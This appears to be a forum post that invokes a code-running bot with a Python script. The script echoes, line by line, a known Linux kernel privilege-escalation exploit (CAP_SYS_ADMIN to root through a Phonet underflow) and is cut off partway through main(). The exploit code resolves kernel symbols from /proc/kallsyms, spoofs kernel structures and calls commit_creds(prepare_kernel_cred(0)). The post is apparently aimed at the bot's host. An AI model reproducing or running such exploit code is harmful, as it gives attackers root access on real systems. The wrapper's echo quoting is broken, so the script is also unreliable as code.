+/u/CompileBot python

import os
os.system("touch x.c")    
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' *  > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach.  Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn't work on 64-bit systems and is a lot of work), I underflow  > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace.  This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo '  > x.c '")
os.system("echo '// Skeleton Structures of the Kernel Structures we're going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo '    int family; > x.c '")
os.system("echo '    void  *buffer1[8]; > x.c '")
os.system("echo '    int (*ioctl)(void *, int, long); > x.c '")
os.system("echo '    void  *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo '    void    *ops; > x.c '")
os.system("echo '    void    *prot; > x.c '")
os.system("echo '    int sock_type;   > x.c '")
os.system("echo '}; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#ifdef __x86_64__  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#define SYM_NAME "local_port_range" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#define SYM_NAME "pn_proto" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo '  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '    commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo '    return 0;       > x.c '")
os.system("echo '} > x.c '")
os.system("echo '  > x.c '")
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '    FILE *f; > x.c '")
os.system("echo '    unsigned long addr; > x.c '")
os.system("echo '    char dummy; > x.c '")
os.system("echo '    char sname[512]; > x.c '")
os.system("echo '    int ret; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    char command[512]; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    sprintf(command, "grep \"%s\" /proc/kallsyms", name); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    f = popen(command, "r"); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    while(ret != EOF) { > x.c '")
os.system("echo '        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '        if (ret == 0) { > x.c '")
os.system("echo '            fscanf(f, "%s\n", sname); > x.c '")
os.system("echo '            continue; > x.c '")
os.system("echo '        } > x.c '")
os.system("echo '  > x.c '")
os.system("echo '        if (!strcmp(name, sname)) { > x.c '")
os.system("echo '  > x.c '")
os.system("echo '            fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); > x.c '")
os.system("echo '            pclose(f); > x.c '")
os.system("echo '            return addr; > x.c '")
os.system("echo '        } > x.c '")
os.system("echo '    } > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    pclose(f); > x.c '")
os.system("echo '    return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'int main(int argc, char * argv[]) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    int sock, proto; > x.c '")
os.system("echo '    unsigned long proto_tab, low_kern_sym, pn_proto; > x.c '")
os.system("echo '    void * map; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    /* Create a socket to load the module for symbol support */ > x.c '")
os.system("echo '    printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); > x.c '")
os.system("echo '    sock = socket(PF_PHONET, SOCK_DGRAM, 0); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    if(sock < 0) { > x.c '")
os.system("echo '        if(errno == EPERM) > x.c '")
os.system("echo '            printf("[*] You don't have CAP_SYS_ADMIN.\n"); > x.c '")